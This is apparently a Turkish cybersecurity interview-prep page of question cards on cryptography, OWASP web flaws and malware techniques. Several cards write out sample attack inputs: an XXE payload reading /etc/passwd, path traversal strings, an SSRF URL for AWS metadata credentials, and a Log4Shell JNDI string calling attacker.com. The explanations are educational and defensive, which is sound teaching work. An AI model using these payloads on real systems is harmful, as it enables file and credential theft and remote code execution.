SHA-3: Farklı yapı (Keccak sponge), yan kanal saldırılarına dayanıklı.
MD5 kırıkSHA-1 SHAtteredSHA-256 güvenliCollisionTek yönlü

Salt ve pepper nedir? Password hashing'de neden önemlidir?

Salt: Her kullanıcı için rastgele üretilen, parola hash'ine eklenen değer. DB'de saklanır. Rainbow table'ı etkisiz kılar.

Pepper: Uygulama sunucusunda saklanır (DB'de değil). DB çalınsa bile crack edilemez.

Güvenli algoritmallar: bcrypt, scrypt, Argon2 — kasıtlı yavaş, brute force zorlaştırır.
Salt per-userPepper sunucudaArgon2bcryptRainbow table

TLS 1.2 ile TLS 1.3 farkları nelerdir?

TLS 1.3 iyileştirmeleri:
  • 1-RTT handshake (TLS 1.2'de 2-RTT), hatta 0-RTT yeniden bağlantı
  • RC4, DES, 3DES, MD5, SHA-1 desteği kaldırıldı
  • Her zaman ECDHE → Perfect Forward Secrecy garantili
  • RSA key exchange kaldırıldı
TLS 1.2: BEAST, POODLE, DROWN gibi saldırılara açık yapılandırmalar mümkün.
1-RTT0-RTTPFS zorunluZayıf cipher kaldırıldı

PKI (Public Key Infrastructure) nedir?

Public key kriptografisini yönetmek için gereken kural, politika, donanım ve yazılım bütünü.

Bileşenler:
  • CA: Sertifika imzalayan güvenilir otorite
  • CRL: İptal edilmiş sertifika listesi
  • OCSP: Gerçek zamanlı sertifika durum sorgu
Zincir: Root CA → Intermediate CA → End-Entity Cert
Kullanım: HTTPS, e-imza, VPN, S/MIME
CACRLOCSPRoot CASertifika zinciri

Perfect Forward Secrecy (PFS) nedir?

Geçmiş oturum anahtarlarının, private key çalınsa bile deşifre edilememesi.

Sorun (PFS olmadan): Saldırgan şifreli trafiği kaydeder. Private key çalınınca tüm geçmiş trafik çözülür.

Çözüm: Her oturum için ayrı ephemeral anahtar türetilir (ECDHE). Oturum bitince silinir.

TLS 1.3'te: PFS zorunludur.
Ephemeral keyECDHEGeçmiş trafik güvendeTLS 1.3 zorunlu

Asimetrik şifreleme: RSA, ECC nasıl çalışır?

RSA: Büyük sayıların çarpanlarına ayrılmasının (factoring) zorluğuna dayanır. 2048-bit minimum, 4096-bit önerilir. Nispeten yavaş.

ECC (Elliptic Curve Cryptography): Eliptik eğri üzerindeki ayrık logaritma problemine dayanır. 256-bit ECC ≈ 3072-bit RSA güvenliği. Çok daha hızlı ve küçük anahtar boyutu.

Kullanım alanları:
  • RSA: TLS, PGP, sertifikalar
  • ECC: TLS 1.3 (ECDHE), ECDSA imza, mobil cihazlar
RSA factoringECC 256≈RSA 3072ECDHEECDSAPerformans farkı

Digital imza nasıl çalışır?

Bir mesajın bütünlüğünü ve göndericinin kimliğini doğrulayan kriptografik mekanizma.

İmzalama:
  1. Mesajın hash'i alınır (SHA-256)
  2. Hash, gönderenin private key'i ile şifrelenir → dijital imza
  3. Mesaj + imza alıcıya gönderilir
Doğrulama:
  1. Alıcı, gönderenin public key'i ile imzayı çözer → hash elde eder
  2. Mesajın hash'ini bağımsız hesaplar
  3. İkisi eşleşirse: mesaj değiştirilmemiş + gerçekten o kişiden gelmiş
Private key imzalarPublic key doğrularHash bütünlükNon-repudiation

Rainbow table saldırısı nedir ve nasıl önlenir?

Önceden hesaplanmış hash → parola eşleştirmelerinin depolduğu büyük tablolardır. Saldırgan çalınan hash'i bu tabloda arar → parolayı anında bulur.

Örnek: admin123 → MD5 → 0192023a7bbd73250516f069df18b500. Bu hash tabloda var → parola bulunur.

Neden etkili: Önceden hesaplanmış, anlık arama yapar.

Önleme:
  • Salt kullan: Her kullanıcı için farklı salt → rainbow table işe yaramaz
  • Güçlü hash algoritması: Argon2, bcrypt, scrypt
  • Güçlü parola politikası: Tablo oluşturmayı zorlaştırır
Önceden hesaplanmışSalt → etkisizArgon2MD5 tehlike

Key exchange algoritmaları: Diffie-Hellman nasıl çalışır?

İki tarafın güvensiz kanal üzerinden, hiç karşılaşmadan ortak gizli bir anahtar oluşturmasını sağlar.

Benzetme: Alice ve Bob boya karıştırır. Ortak renk açık paylaşılır, kendi gizli renkleri karıştırılır. Dinleyen ortak rengi bilse de nihai rengi bulamaz.

Matematiksel: g^a mod p ve g^b mod p değerleri paylaşılır, her taraf karşılıklı hesaplar: g^(ab) mod p

Türleri:
  • DH: Klasik, statik, PFS yok
  • DHE: Ephemeral DH, PFS var
  • ECDHE: Elliptic curve versiyonu, TLS 1.3'te standart
Güvensiz kanalda anahtarg^ab mod pECDHEPFSEphemeral

Sertifika şeffaflığı (Certificate Transparency) nedir?

CA'ların düzenlediği tüm sertifikaların halka açık, değiştirilemez log'lara kaydedilmesini zorunlu kılan Google'ın öncülük ettiği standarttır (RFC 6962).

Amaç: Yetkisiz veya sahte sertifika düzenlenmesini tespit etmek. Herkes herhangi bir domain için hangi sertifikaların düzenlendiğini görebilir.

Kullanım — Red Team: crt.sh ile hedefin tüm subdomain'lerini keşfetme.

Kullanım — Blue Team: Kendi domain'iniz için beklenmedik sertifika düzenlenirse alarm kurabilirsiniz (crt.sh RSS, Cert Spotter).
crt.shSahte sertifika tespitiRFC 6962Subdomain keşfiCA log

PKI nedir? Sertifika otoritesi (CA) nasıl çalışır?

PKI (Public Key Infrastructure): Dijital sertifikaların oluşturulmasını, dağıtılmasını, iptalini ve yönetimini sağlayan altyapıdır.

Bileşenler:
  • CA (Certificate Authority): Sertifika imzalayan güvenilir kurum (DigiCert, Let's Encrypt, GlobalSign)
  • RA (Registration Authority): Kimlik doğrulama yapıp CA'ya sertifika isteği iletir
  • CRL/OCSP: İptal edilmiş sertifikaların listesi / gerçek zamanlı sorgulama
Sertifika zinciri: Root CA → Intermediate CA → End-entity sertifikası

Root CA özel anahtarı: İnternet güvenliğinin temeli — offline ve donanım güvenlik modüllerinde (HSM) saklanır. Root CA'nın ele geçirilmesi felaket senaryosudur.
CACRL/OCSPSertifika zinciriHSMRoot CA güveni

Salting nedir? Password hashing'de neden zorunludur?

Salt: Parola hash'lenmeden önce eklenen rastgele, benzersiz bir değerdir.

Neden gerekli:
Salt olmadan: Aynı şifre → her zaman aynı hash. "123456" hash'i bir kez hesapla, 1 milyon kullanıcıda ara. Rainbow table saldırısı saniyeler içinde tüm şifreleri ele geçirir.

Salt ile: "123456" + benzersiz_salt → farklı hash. Her kullanıcı için ayrı kaba kuvvet gerekir.

İyi parola hashing algoritmaları:
  • bcrypt: Adaptif, kasıtlı yavaş, built-in salt
  • Argon2: Memory-hard, Password Hashing Competition kazananı
  • scrypt: Memory ve CPU yoğun
Yanlış: MD5, SHA-1, hatta SHA-256 — bunlar hız için tasarlanmış, şifre için değil.
Rainbow tablebcryptArgon2Her kullanıcıya farklı saltKasıtlı yavaş

Diffie-Hellman key exchange nasıl çalışır?

İki tarafın güvensiz bir kanal üzerinden ortak bir gizli anahtar oluşturmasını sağlayan matematiksel protokoldür. Anahtarın kendisi hiçbir zaman iletilmez.

Basit analoji (renk karıştırma):
  1. Alice ve Bob ortak sarı rengi paylaşır (public)
  2. Alice gizli turuncu, Bob gizli mavi ekler
  3. Alice'in karışımı (sarı+turuncu) ve Bob'un karışımı (sarı+mavi) değiştirilir
  4. Her ikisi de kendi gizlisini ekler → aynı kahverengi elde edilir
Matematikte: Discrete logarithm probleminin zorluğuna dayanır.

ECDH (Elliptic Curve DH): Aynı prensibi eliptik eğrilerle uygular — çok daha küçük anahtar boyutu ile eşdeğer güvenlik.

Forward Secrecy: DHE (Ephemeral DH) ile her oturum için yeni anahtar üretilir.
Discrete logarithmECDHForward secrecyEphemeralGüvensiz kanal

Quantum computing kriptografiyi nasıl tehdit eder?

Tehdit edilen algoritmalar:
  • RSA, ECC, DH: Shor algoritması ile polinom zamanda kırılabilir. 2048-bit RSA pratik olarak anlamsız hale gelir.
  • AES-128: Grover algoritması etkin anahtar uzunluğunu yarıya indirir (64-bit güvenliğe düşer) — AES-256 ile çözülebilir
"Harvest now, decrypt later" saldırısı: Düşmanlar şifreli trafiği bugün kaydedip quantum bilgisayar gelince çözmeyi planlıyor. Uzun ömürlü veriler şimdiden risk altında.

Post-Quantum Cryptography (PQC):
  • NIST 2024'te standartları belirledi: CRYSTALS-Kyber (anahtar kapsülleme), CRYSTALS-Dilithium (imza)
  • Lattice-based cryptography en umut verici yaklaşım
Shor algoritmasıGrover algoritmasıPost-quantumCRYSTALS-KyberHarvest now decrypt later

TLS sertifika doğrulama nasıl çalışır? Certificate pinning nedir?

Sertifika doğrulama adımları:
  1. Sunucu sertifikasını gönderir
  2. İstemci CA zincirini kontrol eder (Root CA → Intermediate → End-entity)
  3. Sertifikanın geçerlilik tarihini kontrol eder
  4. OCSP/CRL ile iptal kontrolü yapar
  5. Hostname eşleşmesini doğrular (CN/SAN)
Certificate Pinning: Uygulama, belirli bir sertifika veya public key'i hard-code eder. CA zinciri doğrulaması yerine veya ek olarak bu pin ile karşılaştırır.

Avantaj: Sahte CA sertifikasıyla yapılan MITM saldırılarını engeller (kurumsal proxy, rogue CA)
Dezavantaj: Sertifika yenilenince uygulama güncellenmeden bağlantı kopar — bakım zorluğu.
CA zinciriOCSPHostname doğrulamaPinningRogue CA

Appsec

OWASP Top 10'u teker teker açıkla

A01 Broken Access Control
A02 Cryptographic Failures
A03 Injection (SQLi, XSS...)
A04 Insecure Design
A05 Security Misconfiguration
A06 Vulnerable & Outdated Components
A07 Identification & Authentication Failures
A08 Software & Data Integrity Failures
A09 Security Logging & Monitoring Failures
A10 SSRF
A01-A10Web uygulama2021 listesi

SQL injection'ı önlemek için hangi yöntemler kullanılır?

Birincil önlem — Prepared Statements: Kullanıcı girdisi SQL yapısından ayrı tutulur.
SELECT * FROM users WHERE id = ?
Girdi her zaman veri olarak işlenir.

Ek önlemler:
  • ORM kullanımı (Hibernate, SQLAlchemy)
  • Input validation ve whitelist
  • Minimum DB yetkisi
  • WAF (son katman)
  • Hata mesajlarını kullanıcıya gösterme
Prepared statementORMWAFLeast privilege DB

JWT güvenlik sorunları nelerdir?

  • Algorithm confusion: "alg":"none" ile imza doğrulamayı atlatma
  • RS256 → HS256 saldırısı: Public key'i HMAC secret olarak kullanma
  • Weak secret: Kısa HMAC secret → brute force
  • Missing exp: Token ömürsüz olur
  • Sensitive data in payload: Base64 decode edilebilir, şifreli değil
Best practices: RS256/ES256 kullan, exp claim ekle, server-side blacklist
alg:noneRS256→HS256Exp claimBase64 decodeWeak secret

SSRF nedir ve nasıl sömürülür?

Sunucunun saldırganın belirlediği URL'e istek yapmasını sağlayan zafiyet.

Sömürü:
  • AWS metadata: http://169.254.169.254/latest/meta-data/ → cloud credentials
  • İç servis keşfi: http://internal-api:8080/admin
  • Dosya okuma: file:///etc/passwd
Önlemler:
  • URL allowlist
  • Private IP aralıklarını engelle
  • Metadata endpoint'i koru
Metadata endpointİç ağ erişimiURL allowlist169.254.169.254

XXE (XML External Entity) injection nedir ve nasıl sömürülür?

XML işleyicisi harici entity tanımlarına izin verdiğinde saldırganın bu özelliği kötüye kullanmasıdır.

Temel payload:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>


Sömürü senaryoları:
  • Yerel dosya okuma (file:///)
  • SSRF (http://internal-service/)
  • Blind XXE (out-of-band DNS/HTTP ile veri çıkarma)
  • DoS (billion laughs entity expansion)
Önlem: External entity işlemeyi devre dışı bırak. Java'da FEATURE_EXTERNAL_GENERAL_ENTITIES = false.
External entityfile:///SSRF via XXEBillion laughsDisable external

IDOR (Insecure Direct Object Reference) nedir?

Uygulama, nesneye erişimde yeterli yetkilendirme kontrolü yapmadığında oluşan zafiyet.

Örnek: /api/orders/1234 → kullanıcı 1234'ü 1235 ile değiştirince başka kullanıcının siparişini görebilir.

Önlemler:
  • Her resource erişimde yetkilendirme kontrolü
  • Tahmin edilemez ID'ler (UUID)
  • Indirect reference map
BOLAObject level authUUIDYetkilendirme kontrolü

HTTP security headers nelerdir? (CSP, HSTS, X-Frame-Options)

  • Content-Security-Policy (CSP): Hangi kaynaklardan script/style/image yüklenebileceğini tanımlar. XSS saldırısını büyük ölçüde önler.
  • Strict-Transport-Security (HSTS): Tarayıcıya "bu siteye her zaman HTTPS ile bağlan" talimatı. SSL stripping önler.
  • X-Frame-Options: Sayfanın iframe içinde gösterilmesini önler. Clickjacking engeli. Artık CSP'nin frame-ancestors direktifi tercih edilir.
  • X-Content-Type-Options: nosniff: MIME type sniffing'i engeller.
  • Referrer-Policy: Referer header paylaşımını kontrol eder.
  • Permissions-Policy: Kamera, mikrofon, coğrafi konum gibi tarayıcı API erişimlerini kısıtlar.
CSPHSTSX-Frame-OptionsClickjackingXSS önleme

Secure SDLC nedir? DevSecOps ile farkı nedir?

Secure SDLC: Yazılım geliştirme sürecinin her aşamasına güvenliği entegre etme yaklaşımı. Requirements → Design → Implementation → Testing → Deployment → Maintenance her aşamada güvenlik aktiviteleri var.

DevSecOps: Güvenliği DevOps pipeline'ına otomatik olarak entegre etmek. "Shift left" yaklaşımı — güvenliği erken aşamalara taşı.

Araçlar/aktiviteler:
  • SAST (Static Analysis): SonarQube, Semgrep — kod yazarken analiz
  • DAST (Dynamic Analysis): OWASP ZAP — çalışan uygulamayı test et
  • SCA (Software Composition Analysis): Snyk — bağımlılık açıkları
  • IaC scanning: Checkov, tfsec
  • Container scanning: Trivy, Grype
Shift leftSASTDASTSCASnykCheckov

Supply chain saldırısı nedir? Log4Shell ve SolarWinds örnekleri.

Yazılımın geliştirme veya dağıtım zincirindeki bileşenlerin (kütüphane, build tool, update mekanizması) ele geçirilmesiyle gerçekleşen saldırı.

Log4Shell (CVE-2021-44228): Apache Log4j kütüphanesinde JNDI lookup zafiyeti. Logda ${jndi:ldap://attacker.com/a} string'i görününce otomatik RCE. Dünya genelinde milyonlarca uygulama etkilendi.

SolarWinds (2020): Orion yazılımının build pipeline'ı ele geçirildi, update paketi içine backdoor eklendi. 18.000+ kuruluş etkilendi. Devlet kurumları dahil.

Önlemler: SCA (Software Composition Analysis), SBOM (yazılım malzeme listesi), supply chain integrity (Sigstore, SLSA framework), dependency pinning.
Log4Shell JNDISolarWinds build pipelineSBOMSLSASigstoreSCA

CSRF saldırısı nedir ve nasıl önlenir?

Kimliği doğrulanmış kullanıcıyı istemediği bir isteği göndertmek.

Örnek: Kurban bankaya giriş yapmış. Saldırganın sitesi gizli form ile POST /transfer?to=attacker gönderir.

Önlemler:
  • CSRF token (per-request, unpredictable)
  • SameSite cookie attribute (Strict/Lax)
  • Origin/Referer header kontrolü
Forged requestCSRF tokenSameSite cookie

JWT (JSON Web Token) güvenlik sorunları nelerdir?

Yaygın zafiyet türleri:
  • Algorithm confusion: "alg":"none" ile imza doğrulamayı atlatma
  • RS256 → HS256 saldırısı: Public key'i HS256'da secret olarak kullanma
  • Weak secret: Kısa/tahmin edilebilir HMAC secret → brute force
  • Missing expiration: exp claim kontrolü yapılmamışsa token ömürsüzdür
  • Sensitive data in payload: JWT Base64 decode edilebilir, şifreli değil
Best practices: RS256/ES256 kullan, exp claim ekle, jti (JWT ID) ile token tekrar kullanımını önle, server-side blacklist tut
alg:noneRS256→HS256Exp claimBase64 decode edilebilirWeak secret

OAuth 2.0 ve OpenID Connect güvenlik açıkları nelerdir?

OAuth 2.0 güvenlik sorunları:
  • CSRF: State parametresi olmadan CSRF saldırısı
  • Open redirect: Redirect URI'ın tam eşleşme yerine prefix kontrol edilmesi
  • Authorization code interception: PKCE (Proof Key for Code Exchange) yoksa
  • Token leakage: Access token URL'de gönderilirse referer header ile sızar
OpenID Connect sorunları:
  • ID token imza doğrulama atlatma
  • nonce kontrolü yapılmaması → replay attack
Best practices: PKCE zorunlu (public clients), state parametresi, strict redirect URI, short-lived token
PKCEState parameterOpen redirectCSRFnonce

SSRF (Server-Side Request Forgery) nedir ve nasıl sömürülür?

Sunucunun, saldırganın belirlediği URL'e istek yapmasını sağlayan zafiyet. Sunucu iç ağa erişebildiği için tehlikeli.

Sömürü senaryoları:
  • AWS metadata endpoint: http://169.254.169.254/latest/meta-data/iam/security-credentials/ → cloud credentials çalma
  • İç servis keşfi: http://internal-api:8080/admin
  • Port tarama: http://localhost:22
  • Dosya okuma: file:///etc/passwd
Önlemler:
  • Allowlist (izin verilen URL'ler)
  • SSRF güvenlik kütüphanesi
  • Cloud metadata endpoint'i disable et veya güvenlik duvarıyla koru
  • Private IP aralıklarını engelle
Metadata endpointİç ağ erişimiURL allowlist169.254.169.254Cloud credentials

Session fixation saldırısı nedir?

Saldırgan, kurbanın oturumunu bilinen bir session ID'ye "sabitleme" saldırısıdır.

Senaryo:
  1. Saldırgan uygulamadan bir session ID alır
  2. Bu session ID'yi kurbanın tarayıcısına yerleştirir (URL parametresi, cookie inject)
  3. Kurban bu session ile giriş yapar
  4. Uygulama aynı session ID'yi devam ettirirse saldırgan da authenticated sayılır
Önlem: Login başarılı olduktan sonra yeni session ID üret (session regeneration). PHP'de session_regenerate_id(true).
Session regenerationLogin sonrası yeni IDCookie injectFixed session

Clickjacking nedir ve nasıl önlenir?

Saldırgan, kurbanın görmediği şeffaf bir iframe içine hedef siteyi gömer. Kullanıcı kendi gördüğü bir butona tıklarken aslında iframe'deki farklı bir aksiyonu tetikler.

Örnek: "Tebrikler, ödülünüzü alın" butonu arkasında Facebook "Beğen" butonu var.

Önlemler:
  • X-Frame-Options: DENY veya SAMEORIGIN
  • Content-Security-Policy: frame-ancestors 'none'
  • Frame busting JavaScript (zayıf alternatif)
Transparent iframeX-Frame-OptionsCSP frame-ancestorsUI redressing

Directory traversal / path traversal nedir?

Uygulama, kullanıcı girdisini dosya yolu olarak kullandığında saldırganın kök dizinin dışına çıkmasına izin vermesidir.

Örnek payload: ../../../../etc/passwd
URL'de: ?file=../../etc/shadow

URL encoded: %2e%2e%2f%2e%2e%2f (bypass filtreler için)

Önlemler:
  • Canonicalize path sonra allowlist ile karşılaştır
  • Kullanıcı girdisini dosya yolu olarak kullanma
  • Chroot / jail (OS seviyesi izolasyon)
  • Web sunucusu root'u minimal izinle çalıştır
../../../etc/passwdCanonicalizeAllowlistPath normalization

Insecure deserialization nedir?

Uygulama, güvenilmeyen kaynaktan gelen serialize edilmiş nesneyi doğrulamadan deserialize ettiğinde oluşan zafiyet.

Tehlike: Saldırgan serialize edilmiş nesneyi manipüle eder. Deserializasyon sırasında uygulamanın kendi kod yolları çalışır → Remote Code Execution mümkün.

Etkilenen diller: Java (Apache Commons Collections), PHP, Python pickle, .NET

Gerçek örnek: Log4Shell'deki JNDI lookup kısmen deserializasyon zinciri içerir.

Önlemler:
  • Güvenilmeyen veriyi deserialize etme
  • Integrity check (HMAC imzalama)
  • Allowlist based deserialization
  • Java agent ile gadget chain bloklama (SerialKiller)
RCE riskiJava gadget chainPHP unserializeHMAC imzalamaPickle

API güvenliğinde en sık karşılaşılan açıklar nelerdir? (OWASP API Top 10)

OWASP API Security Top 10 (2023):
  • API1 Broken Object Level Authorization (BOLA/IDOR): /api/orders/123 yerine /api/orders/124 erişimi
  • API2 Broken Authentication: Zayıf token, brute force, açık endpoint
  • API3 Broken Object Property Level Auth: Sadece belirli field'ların güncellenmesi gerekirken tümü değiştirilebilir (mass assignment)
  • API4 Unrestricted Resource Consumption: Rate limit yok → DoS, aşırı maliyet
  • API5 Broken Function Level Auth: Admin endpoint'leri user token ile erişilebilir
  • API8 Security Misconfiguration: CORS açık, verbose hata
BOLAMass assignmentRate limitOWASP API Top 10Admin endpoint

GraphQL güvenlik açıkları nelerdir?

  • Introspection: Şema sorgulama ile tüm tipler/alanlar keşfedilebilir → production'da kapat
  • Depth/complexity limit yok: İç içe sorgular sunucuyu çökertir (query depth saldırısı)
  • Batch query attack: Tek istekte binlerce işlem → rate limit bypass
  • IDOR/BOLA: ID bazlı object erişim kontrolü eksikliği
  • Injection: Argümanlar doğrudan DB'ye aktarılırsa SQL/NoSQL injection
Araçlar: InQL (Burp extension), GraphQL Voyager
Önlemler: Introspection kapat (prod), depth limit, persisted queries, query complexity analizi
IntrospectionQuery depthBatch attackInQLComplexity limit

CORS (Cross-Origin Resource Sharing) misconfiguration neden tehlikelidir?

Tarayıcı, farklı origin'den gelen JavaScript isteklerini same-origin policy ile engeller. CORS bu kısıtlamayı kontrollü gevşetir.

Tehlikeli yapılandırmalar:
  • Access-Control-Allow-Origin: * + cookie içeren endpoint → cookie çalınamaz ama auth header çalınabilir
  • Origin'i dinamik yansıtma: gelen Origin header'ı doğrulamadan ACAO'ya kopyalamak → herhangi domain erişir
  • null origin'e izin verme → sandbox iframe'den exploit
Örnek saldırı: Saldırgan victim.com'un API'sine kendi sitesinden istek attırır, token çalar.
Önlem: Whitelist tabanlı origin kontrolü, credentials ile birlikte wildcard kullanma.
Access-Control-Allow-OriginOrigin reflectionnull originWhitelistWildcard tehlike

CSRF nedir? Nasıl önlenir?

CSRF (Cross-Site Request Forgery): Kurbanın tarayıcısını kullanarak, kurbanın yetkisiyle istek oluşturmayı sağlayan saldırı türüdür.

Senaryo: Kurban bankasına giriş yapmış durumda. Saldırgan, kurbanın ziyaret ettiği bir sayfaya gizli bir form yerleştirir: <img src="bank.com/transfer?to=attacker&amount=5000">. Tarayıcı otomatik cookie gönderdiği için banka isteği meşru sayar.

Önlemler:
  • CSRF Token: Her form için tahmin edilemez, sunucu taraflı token. Her istekte doğrulanır.
  • SameSite Cookie: SameSite=Strict/Lax ile cookie başka siteden isteğe gitmez
  • Origin/Referer header kontrolü
  • Custom request header (XMLHttpRequest tabanlı)
CSRF tokenSameSite cookieCross-site istekCookie otomatik gönderimReferer kontrolü

XXE (XML External Entity) nedir?

XML işleyen uygulamaların, kötü niyetli olarak yapılandırılmış XML girişi aracılığıyla istismar edildiği güvenlik açığıdır.

Nasıl çalışır:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><data>&xxe;</data></root>


XML parser bu entity'yi çözümlediğinde /etc/passwd içeriğini response'a yerleştirir.

Saldırı vektörleri:
  • Dosya okuma (/etc/passwd, AWS metadata)
  • SSRF (internal servislere istek)
  • DoS (Billion Laughs — nested entity ile bellek tüketimi)
Önlem: External entity işlemeyi devre dışı bırak (DTD disable), güvenli XML kütüphaneleri kullan, input validation.
DTDExternal entityFile readSSRFBillion Laughs

HTTP security header'ları nelerdir? Hangisi ne işe yarar?

Tarayıcıya güvenlik talimatı veren response header'larıdır:

  • Content-Security-Policy (CSP): Hangi kaynaklardan script/style/img yükleneceğini belirler. XSS etkisini azaltır.
  • Strict-Transport-Security (HSTS): Tarayıcıya "bu siteye hep HTTPS ile bağlan" der. SSL stripping'i önler.
  • X-Frame-Options: Clickjacking önler. DENY veya SAMEORIGIN
  • X-Content-Type-Options: nosniff — MIME type sniffing'i önler
  • Referrer-Policy: Referer header'da ne kadar bilgi gönderileceğini kontrol eder
  • Permissions-Policy: Kamera, mikrofon, geolocation gibi tarayıcı API'lerini kısıtlar
Test için: securityheaders.com
CSPHSTSX-Frame-OptionsClickjackingnosniff

CORS nedir? Yanlış yapılandırma nasıl istismar edilir?

CORS (Cross-Origin Resource Sharing): Tarayıcının farklı origin'lerden gelen istekleri kontrol etmesini sağlayan mekanizmadır. Same-Origin Policy'yi kontrollü şekilde gevşetir.

Nasıl çalışır: Sunucu, Access-Control-Allow-Origin header'ı ile hangi origin'lerin erişebileceğini belirtir.

Tehlikeli yanlış yapılandırmalar:
  • Access-Control-Allow-Origin: * + Access-Control-Allow-Credentials: true → imkânsız kombinasyon, bazı frameworkler hatalı uygular
  • Origin header'ını doğrulamadan yansıtma → saldırgan kendi origin'ini geçirir, cross-origin cookie okur
  • Null origin kabul etme → sandbox iframe ile bypass
İstismar: Saldırgan kurbanı kendi sitesine çeker, kurban adına API istekleri yapar ve hassas veriyi okur.
Same-Origin PolicyAccess-Control-Allow-OriginPreflightCredential ile wildcardOrigin yansıtma

JWT (JSON Web Token) güvenliği — yaygın açıklar nelerdir?

JWT üç bölümden oluşur: Header.Payload.Signature

Yaygın güvenlik açıkları:
  • Algorithm confusion (alg:none): Saldırgan header'daki algoritmayı "none" yaparak imzayı atlatır. Sunucu algorimaı header'dan okuyorsa imzasız token kabul edilebilir.
  • RS256 → HS256 geçişi: Public key'i HMAC secret olarak kullanarak token imzalama
  • Weak secret: HMAC secret zayıfsa offline brute force mümkün
  • Claim validation eksikliği: exp (expiration), iss (issuer), aud (audience) kontrol edilmezse
  • Sensitive data in payload: Payload base64 ile encode edilmiştir, şifreli değildir — herkese açık
Best practice: Güçlü secret, RS256/ES256, kütüphane güncelleme, tüm claim'leri doğrula.
alg:noneAlgorithm confusionPayload şifresizexp kontrolüRS256

Clickjacking nedir? Nasıl önlenir?

Saldırganın meşru bir siteyi görünmez iframe içine yerleştirerek kullanıcıyı farkında olmadan tıklatmasıdır.

Senaryo: Saldırgan "Bedava iPhone kazan!" butonu olan bir site yapar. Arka planda kurbanın giriş yaptığı banka sitesi invisible iframe'de açıktır. "iPhone butonu" aslında bankadaki "Para Transfer Et" butonunun üstündedir.

Önlemler:
  • X-Frame-Options: DENY/SAMEORIGIN — sitenin iframe içine alınmasını engeller
  • CSP frame-ancestors direktifi: Content-Security-Policy: frame-ancestors 'none' — X-Frame-Options'ın modern versiyonu
JavaScript frame-buster'lar eskiden kullanılırdı ama bypass edilebilirdi — header tabanlı önlem daha güvenilir.
Invisible iframeX-Frame-OptionsCSP frame-ancestorsUI redressFrame-buster

Malware

Malware türleri nelerdir?

  • Virus: Kendini dosyalara kopyalar, host programa ihtiyaç duyar
  • Worm: Ağ üzerinden kendi kendine yayılır (WannaCry, Slammer)
  • Trojan: Meşru gibi görünen zararlı program
  • Ransomware: Dosyaları şifreler, fidye ister (LockBit, BlackCat)
  • Rootkit: Varlığını gizler, OS seviyesinde derin erişim
  • Spyware: Klavye takibi, veri toplama
  • Botnet: C2'ye bağlı zombi bilgisayar ağı
  • Fileless: Diske yazmaz, RAM'de çalışır
VirusWormTrojanRansomwareFilelessRootkit

Ransomware'in çalışma mekanizması nasıldır?

Kill chain:
  1. Initial Access: Phishing, RDP brute force, exploit
  2. Execution: Dropper → payload
  3. Privilege Escalation: Admin/SYSTEM yetkisi
  4. Lateral Movement: Domain'e yayılma
  5. Data Exfiltration: Veri çalma (double extortion)
  6. Inhibit Recovery: Yedekler, shadow kopya, AV devre dışı
  7. Encryption: AES dosya şifreleme, RSA anahtar şifreleme
Kill chainDouble extortionShadow copy silmeAES+RSA

Statik ve dinamik malware analizi farkı nedir?

Statik: Malware'i çalıştırmadan inceleme.
  • String extraction → URL, IP ipuçları
  • PE header analizi
  • Disassembly (IDA Pro, Ghidra)
  • Packer tespiti (Detect-It-Easy)
Dinamik: Kontrollü ortamda çalıştırma.
  • Process activity (Process Monitor)
  • Ağ trafiği (Wireshark)
  • Registry/file değişiklikleri
Statik çalıştırmadanDinamik sandboxIDA ProGhidra

YARA rule nedir ve nasıl yazılır?

Malware ve şüpheli dosyaları pattern'a göre tanımlayan kural dili.

Yapı:rule MalwareName {
 strings:
  $s1 = "C2-domain.com"
  $hex = { 4D 5A 90 00 }
 condition:
  $s1 and $hex
}


Kullanım: SIEM alert, EDR kural, threat hunting
Kaynak: YARA-Rules GitHub, VirusTotal
Pattern matchingStringsConditionThreat hunting

Disk forensics'te incelenmesi gereken artifact'lar nelerdir?

  • Event Logs (C:\Windows\System32\winevt)
  • Prefetch — hangi program ne zaman çalıştı
  • Registry (NTUSER.DAT, SAM, SYSTEM) — persistence, user activity
  • ShellBags — klasör erişim geçmişi
  • LNK dosyaları — son açılan dosyalar
  • Browser history / cookies
  • $MFT (Master File Table)
Araçlar: Autopsy, FTK, Eric Zimmerman Tools (KAPE)
PrefetchRegistryShellBagsMFTKAPE

Persistence mekanizmaları nelerdir? (MITRE ATT&CK T1547)

Saldırganın sistem yeniden başlatılsa bile erişimini korumak için kullandığı yöntemler:

Windows:
  • Registry Run Keys: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • Scheduled Tasks (schtasks /create)
  • Services: Yeni servis oluşturma veya mevcut servisi bozma
  • Startup folder
  • DLL hijacking (meşru uygulama kötü DLL yükler)
  • WMI subscriptions
  • COM hijacking
Linux:
  • crontab, /etc/cron.d/
  • systemd service
  • ~/.bashrc, ~/.profile
  • /etc/rc.local
Registry Run keyScheduled taskWMI subscriptioncrontabT1547

Bir ransomware'in çalışma mekanizması nasıldır?

Tipik ransomware saldırı zinciri:
  1. Initial Access: Phishing email, RDP brute force, exploit
  2. Execution: Dropper çalışır, payload drop eder
  3. Privilege Escalation: Admin/SYSTEM yetkisi alınır
  4. Lateral Movement: Domain'deki diğer sistemlere yayılır
  5. Data Exfiltration: Hassas veriler çalınır (double extortion)
  6. Inhibit Recovery: Yedekler, shadow kopya, antivirus devre dışı bırakılır
  7. Encryption: AES ile dosyalar şifrelenir, key RSA ile şifrelenir, fidye notu bırakılır
Double extortion: Şifreleme + veri yayınlama tehdidi
Kill chainDouble extortionShadow copy silmeAES+RSALateral movement

Process injection teknikleri nelerdir? (DLL injection, process hollowing)

Zararlı kod, meşru bir process'in adres alanına enjekte edilerek gizlenir ve AV/EDR bypass sağlanır.

DLL Injection: Hedef process'e OpenProcess → VirtualAllocEx → WriteProcessMemory → CreateRemoteThread zinciiriyle zararlı DLL yüklenir.

Process Hollowing: Meşru process (svchost.exe gibi) suspend modda oluşturulur, içeriği boşaltılır, zararlı kod yazılır, devam ettirilir.

APC Injection: Asenkron Procedure Call kuyruğuna zararlı fonksiyon ekleme.

Reflective DLL Injection: DLL'i diske yazmadan direkt belleğe yükleme (Cobalt Strike kullanır).
DLL injectionProcess hollowingReflective injectionCreateRemoteThreadAPC

Sandbox nedir? Malware analizinde nasıl kullanılır?

